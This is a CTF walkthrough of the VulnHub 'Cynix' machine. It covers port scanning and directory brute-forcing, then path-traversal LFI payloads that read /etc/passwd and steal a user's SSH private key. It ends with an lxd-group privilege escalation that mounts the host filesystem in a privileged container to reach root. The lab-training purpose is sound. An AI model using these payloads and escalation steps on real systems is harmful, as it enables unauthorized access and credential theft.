Today we are sharing another
CTF Walkthrough named Cynix Post by Vulnerhub and credit goes to “Sumit Verma” and
the level difficulty is set
Intermediate-Hard. You have to hunt two flags, and this is a boot to root
challenge. Download it from here.
Table of Content
Network scaning
·
Netdiscover
·
Nmap
Enumeration
·
Abousing HTTP
·
Dirbuster
Exploiting LFI
·
Brupsuite
·
Privilege
Esclation
Lxd
Walkthrough
Network Scanning
As you know, this is intial
phase where we choose netdiscover for ntwork scan for identify host IP and this
we have 192.168.1.105 as our host IP.
In our next step we love to use nmap for network ports
enumeration, thus we run following command and found port 80 is open for HTTP
and 6688 is open for SSH and also the host operating system is Linux based OS.
nmap -p- -A 192.168.1.105
Enumeration
After network scanning, enumeration is next phase,
because it helps a pentester for to dig
out suspicious information or loopholes in the installed application, therefore
we navigate to web browser and explored the host IP as shown but unfortunately we found nothing except
apache default page.
We continue this with the directory brute force attack and
the dirbuster used for directory listing. As you can see, we've found a
directory named /lavalamp to learn more about dirbuster, read the article from here.
We're browsing the /lavalamp in the web browser and we're
welcomed by the web page shown in the image. Then we dig more and more,
including its source code, but found no hint for the next step.
As a result, we fill out the contact form as shown in the
image below and intercept the http request of the browser in the browser.
The intercepted request shows that, here the HTTP Post
method is used to submit the request at /canyobypassme.php page.
Thus, we navigate to /lavalamp/canyoubypassme.php as found above,
an image on the web page shown below.
As the web page displays the image only and it was troubling
us, thus, we check its source code and notice a hidden form with opacity 0:0
inside the web page.
With the help inspect element we changed the opacity 0:0
to 0:1 and got the form visible on the web page.
Now it was time to intercept the form's http request by
entering a value as a specific number. So, we've got the intercepted request in
the burpsuite where we've seen the parameter "file=1" and maybe
there's a possibility for LFI, so we've sent the request to the repeater.
For validating LFI we looked for /etc/passwd file by
injecting “../../../etc/passwd” in the parameter “file=1” as
checked its response.
Luckily, we found the application is vulnerable to LFI and
from its result we notice record entry for username “ford” and “lxd”
Exploiting LFI
Since ssh is installed on the host machine, so we also check
for ssh rsa key by injecting “../../../home/ford/.ssh/id_rsa” in
parameter ‘’file=8” as result we found id_rsa key for ssh.
We copied the id_rsa key in a text document and named it
“key” and also grant permission 600, and finally get logged in and spawn the
ssh shell of the machine.
chmod 600 key
ssh -i key ford@192.168.1.105
we found our fist flag user.txt file inside ford’s /home
directory and for privilege escalation we check user_id where we saw ford is
member of lxd group thus we can escalated go with lxd privilege escalation
which we had explained in our previous article.
Privilege
Escalation
In order to take escalate the root privilege of the host
machine you have to create an image for lxd thus you need to perform the
following the action:
1. Steps
to be performed on the attacker machine:
§ Download
build-alpine in your local machine through the git repository.
§ Execute
the script “build -alpine” that will build the latest Alpine image as a
compressed file, this step must be executed by the root user.
§ Transfer
the tar file to the host machine
2. Steps
to be performed on the host machine:
§ Download
the alpine image
§ Import
image for lxd
§ Initialize
the image inside a new container.
§ Mount
the container inside the /root directory
So, we downloaded the build alpine using the GitHub
repose.
git clone
https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
On running the above command, a tar.gz file is created in
the working directory that we have transferred to the host machine.
python -m SimpleHTTPServer
On another hand we will download the alpine-image inside
/tmp directory on the host machine.
cd /tmp
wget
http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
After the image is built it can be added as an image to LXD
as follows:
lxc image import
./apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
Use the list command to check the list of images
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/
path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
Once inside the container, navigate to /mnt/root to see all
resources from the host machine.
After running the bash file. We see that we have a different
shell, it is the shell of the container. This container has all the files of
the host machine. So, we enumerated for the root flag and found it.
mnt/root/root
ls
flag.txt
cat flag.txt
0 comments:
Post a Comment